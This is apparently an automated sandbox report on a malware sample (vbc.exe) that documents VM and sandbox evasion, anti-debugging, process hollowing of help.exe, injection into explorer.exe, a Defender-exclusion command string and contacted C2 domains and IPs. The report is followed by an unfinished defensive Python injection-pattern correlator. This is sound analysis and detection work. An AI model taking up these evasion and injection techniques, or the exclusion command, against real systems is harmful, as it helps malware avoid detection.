Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.vbc.exe.2aec108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6420, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000002B48604 second address: 0000000002B4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000002B4899E second address: 0000000002B489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\vbc.exe TID: 6424 Thread sleep time: -38500s >= -30000s
Source: C:\Users\user\Desktop\vbc.exe TID: 6464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 6612 Thread sleep time: -40000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004088D0 rdtsc 8_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5311
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 38500
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.277498776.0000000008CEA000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}froQQ
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000B.00000000.303948954.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.311106816.0000000008C73000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.292121937.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000B.00000000.280486172.000000000ECF7000.00000004.00000001.sdmp Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004088D0 rdtsc 8_2_004088D0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181C182 mov eax, dword ptr fs:[00000030h] 8_2_0181C182
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182A185 mov eax, dword ptr fs:[00000030h] 8_2_0182A185
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h] 8_2_017FB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h] 8_2_0182FD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018235A1 mov eax, dword ptr fs:[00000030h] 8_2_018235A1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FAD30 mov eax, dword ptr fs:[00000030h] 8_2_017FAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018A8DF1 mov eax, dword ptr fs:[00000030h] 8_2_018A8DF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h] 8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov ecx, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8D34 mov eax, dword ptr fs:[00000030h] 8_2_018C8D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182513A mov eax, dword ptr fs:[00000030h] 8_2_0182513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h] 8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01833D43 mov eax, dword ptr fs:[00000030h] 8_2_01833D43
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h] 8_2_0181B944
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01873540 mov eax, dword ptr fs:[00000030h] 8_2_01873540
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01817D50 mov eax, dword ptr fs:[00000030h] 8_2_01817D50
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h] 8_2_0181C577
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01873884 mov eax, dword ptr fs:[00000030h] 8_2_01873884
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018390AF mov eax, dword ptr fs:[00000030h] 8_2_018390AF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182F0BF mov ecx, dword ptr fs:[00000030h] 8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h] 8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8CD6 mov eax, dword ptr fs:[00000030h] 8_2_018C8CD6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B14FB mov eax, dword ptr fs:[00000030h] 8_2_018B14FB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h] 8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h] 8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h] 8_2_018C4015
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h] 8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182BC2C mov eax, dword ptr fs:[00000030h] 8_2_0182BC2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h] 8_2_0188C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181746D mov eax, dword ptr fs:[00000030h] 8_2_0181746D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B2073 mov eax, dword ptr fs:[00000030h] 8_2_018B2073
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C1074 mov eax, dword ptr fs:[00000030h] 8_2_018C1074
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9080 mov eax, dword ptr fs:[00000030h] 8_2_017F9080
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B138A mov eax, dword ptr fs:[00000030h] 8_2_018B138A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h] 8_2_01801B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FDB60 mov ecx, dword ptr fs:[00000030h] 8_2_017FDB60
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FF358 mov eax, dword ptr fs:[00000030h] 8_2_017FF358
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C5BA5 mov eax, dword ptr fs:[00000030h] 8_2_018C5BA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FDB40 mov eax, dword ptr fs:[00000030h] 8_2_017FDB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h] 8_2_017F4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h] 8_2_017F4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h] 8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h] 8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B131B mov eax, dword ptr fs:[00000030h] 8_2_018B131B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h] 8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h] 8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182E730 mov eax, dword ptr fs:[00000030h] 8_2_0182E730
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180EF40 mov eax, dword ptr fs:[00000030h] 8_2_0180EF40
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8B58 mov eax, dword ptr fs:[00000030h] 8_2_018C8B58
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8F6A mov eax, dword ptr fs:[00000030h] 8_2_018C8F6A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FE87 mov eax, dword ptr fs:[00000030h] 8_2_0188FE87
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h] 8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h] 8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018746A7 mov eax, dword ptr fs:[00000030h] 8_2_018746A7
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AFEC0 mov eax, dword ptr fs:[00000030h] 8_2_018AFEC0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018236CC mov eax, dword ptr fs:[00000030h] 8_2_018236CC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8ED6 mov eax, dword ptr fs:[00000030h] 8_2_018C8ED6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FE620 mov eax, dword ptr fs:[00000030h] 8_2_017FE620
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018216E0 mov ecx, dword ptr fs:[00000030h] 8_2_018216E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018076E2 mov eax, dword ptr fs:[00000030h] 8_2_018076E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AFE3F mov eax, dword ptr fs:[00000030h] 8_2_018AFE3F
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h] 8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h] 8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180766D mov eax, dword ptr fs:[00000030h] 8_2_0180766D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183927A mov eax, dword ptr fs:[00000030h] 8_2_0183927A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00409B40 LdrLoadDll, 8_2_00409B40
Source: C:\Users\user\Desktop\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe Domain query: www.joye.club
Source: C:\Windows\explorer.exe Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe Network Connect: 44.227.65.245 80
Source: C:\Windows\explorer.exe Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.114 80
Source: C:\Windows\explorer.exe Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 118.27.122.222 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.188.247 80
Source: C:\Windows\explorer.exe Network Connect: 101.132.116.91 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 120000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3292
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3292
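The hollowing, section-mapping, APC and thread-context evidence above is what a behavioural sensor sees as an ordered stream of cross-process API calls: vbc.exe unmaps help.exe's image, maps executable sections into help.exe and explorer.exe, queues an APC in explorer.exe and rewrites a thread context in pid 3292, and the hollowed help.exe then repeats the mapping and context rewrite against explorer.exe. The following Python is an added example, not part of this report and not FormBook's code, that replays such a stream per (source pid, target pid) and labels the three patterns. The event records, field names and pids are constructed for the example; the API names and the CREATE_SUSPENDED and PAGE_EXECUTE_* values are the documented Win32/NT ones.

```python
from collections import defaultdict
from dataclasses import dataclass

# Documented Win32 constants used to interpret the events.
CREATE_SUSPENDED = 0x00000004
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE


@dataclass
class InjectState:
    """What one source process has done so far to one target process."""
    suspended: bool = False     # CreateProcess(..., CREATE_SUSPENDED) by source
    unmapped: bool = False      # NtUnmapViewOfSection on the target's image
    exec_region: bool = False   # an executable region now exists in the target
    wrote: bool = False         # payload bytes placed in the target
    context_set: bool = False   # SetThreadContext on a target thread
    apc_queued: bool = False    # QueueUserAPC on a target thread


def _note(findings, key, label):
    if label not in findings[key]:
        findings[key].append(label)


def correlate(events):
    """Replay cross-process API events in order and label injection patterns.

    events: iterable of dicts with keys src, dst, api and optional flags/protect.
    Returns {(src, dst): [labels]} containing only pairs that matched a pattern.
    """
    states = defaultdict(InjectState)
    findings = defaultdict(list)
    for ev in events:
        key = (ev["src"], ev["dst"])
        st = states[key]
        api = ev["api"]
        if api == "CreateProcess" and ev.get("flags", 0) & CREATE_SUSPENDED:
            st.suspended = True
        elif api in ("VirtualAllocEx", "VirtualProtectEx") and ev.get("protect", 0) & EXEC_MASK:
            st.exec_region = True
        elif api == "NtMapViewOfSection" and ev.get("protect", 0) & EXEC_MASK:
            # A section mapped executable into the target already carries the
            # payload (the source wrote it through its own view): no WriteProcessMemory.
            st.exec_region = True
            st.wrote = True
        elif api == "NtUnmapViewOfSection":
            st.unmapped = True
        elif api == "WriteProcessMemory":
            st.wrote = True
        elif api == "SetThreadContext":
            st.context_set = True
        elif api == "QueueUserAPC":
            st.apc_queued = True
        elif api == "ResumeThread":
            if st.suspended and st.unmapped and st.wrote and st.context_set:
                label = "process hollowing"          # original image gone before it ever ran
            elif st.suspended and st.wrote and st.context_set:
                label = "suspended-process injection via SetThreadContext"
            elif st.wrote and st.context_set:
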